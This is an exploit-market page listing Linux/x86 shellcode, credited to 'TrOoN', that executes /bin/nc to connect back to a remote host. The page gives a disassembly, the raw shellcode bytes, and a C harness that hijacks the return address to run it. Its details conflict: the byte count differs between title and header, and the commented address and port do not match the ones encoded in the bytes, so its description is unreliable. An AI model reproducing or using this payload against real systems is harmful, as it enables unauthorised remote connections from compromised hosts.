[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 - netcat : connect back port 8081 - 77 bytes

Author
TrOoN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17448
Category
shellcode
Date add
27-01-2012
Platform
linux/x86
# Title : Linux/x86 - netcat : connect back port 8081 - 76 bytes
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform :Linux/x86      | backBox    | uBuntU Fr
# Type : local exploit /SHELL CODE
###



/*
08048060 <_start>:
 8048060:       eb 2a                   jmp    804808c <GotoCall>
 
08048062 <shellcode>:
 8048062:       5e                      pop    %esi
 8048063:       31 c0                   xor    %eax,%eax
 8048065:       88 46 07                mov    %al,0x7(%esi)
 8048068:       88 46 15                mov    %al,0x15(%esi)
 804806b:       88 46 1a                mov    %al,0x1a(%esi)
 804806e:       89 76 1b                mov    %esi,0x1b(%esi)
 8048071:       8d 5e 08                lea    0x8(%esi),%ebx
 8048074:       89 5e 1f                mov    %ebx,0x1f(%esi)
 8048077:       8d 5e 16                lea    0x16(%esi),%ebx
 804807a:       89 5e 23                mov    %ebx,0x23(%esi)
 804807d:       89 46 27                mov    %eax,0x27(%esi)
 8048080:       b0 0b                   mov    $0xb,%al
 8048082:       89 f3                   mov    %esi,%ebx
 8048084:       8d 4e 1b                lea    0x1b(%esi),%ecx
 8048087:       8d 56 27                lea    0x27(%esi),%edx
 804808a:       cd 80                   int    $0x80
 
0804808c <GotoCall>:
 804808c:       e8 d1 ff ff ff          call   8048062 <shellcode>
 8048091:       2f                      das   
 8048092:       62 69 6e                bound  %ebp,0x6e(%ecx)
 8048095:       2f                      das   
 8048096:       6e                      outsb  %ds:(%esi),(%dx)
 8048097:       63 23                   arpl   %sp,(%ebx)
 8048099:       31 39                   xor    %edi,(%ecx)
 804809b:       32 2e                   xor    (%esi),%ch
 804809d:       31 36                   xor    %esi,(%esi)
 804809f:       38 2e                   cmp    %ch,(%esi)
 80480a1:       31 2e                   xor    %ebp,(%esi)
 80480a3:       31 30                   xor    %esi,(%eax)
 80480a5:       31 23                   xor    %esp,(%ebx)
 80480a7:       38 30                   cmp    %dh,(%eax)
 80480a9:       38 30                   cmp    %dh,(%eax)
 80480ab:       23 41 41                and    0x41(%ecx),%eax
 80480ae:       41                      inc    %ecx
 80480af:       41                      inc    %ecx
 80480b0:       42                      inc    %edx
 80480b1:       42                      inc    %edx
 80480b2:       42                      inc    %edx
 80480b3:       42                      inc    %edx
 80480b4:       43                      inc    %ebx
 80480b5:       43                      inc    %ebx
 80480b6:       43                      inc    %ebx
 80480b7:       43                      inc    %ebx
 80480b8:       44                      inc    %esp
 80480b9:       44                      inc    %esp
 80480ba:       44                      inc    %esp
 80480bb:       44                      inc    %esp
*/
 
// /bin/nc 192.168.1.100 8081
char shellcode[] =
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x15\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08\x89"
"\x5e\x1f\x8d\x5e\x16\x89\x5e\x23\x89\x46\x27\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x27"
"\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x31\x39\x32\x2e\x31\x36"
"\x38\x2e\x31\x2e\x31\x30\x31\x23\x38\x30\x38\x30\x23";
 
int main()
{
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}



################################################ TrOon ######################################

team mosta - exploit-bd - security-ray - hacker fire - elite_troJn - hacker-1420 - bResCo-Dz -
turkhackteam.NET - aLl algeRian hackXOR



#  0day.today [2024-12-24]  #